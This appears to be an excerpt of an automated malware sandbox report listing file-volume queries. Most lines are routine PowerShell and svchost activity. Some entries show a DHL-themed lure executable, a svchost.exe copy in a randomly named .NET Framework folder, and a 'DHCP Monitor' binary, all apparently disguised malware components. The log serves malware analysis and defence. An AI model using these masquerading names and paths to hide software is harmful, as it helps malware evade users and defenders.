Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Queries volume information: C:\Users\user\Desktop\DHL_document11022020680908911.exe VolumeInformation
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL_document11022020680908911.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\zjIuYLHx\svchost.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
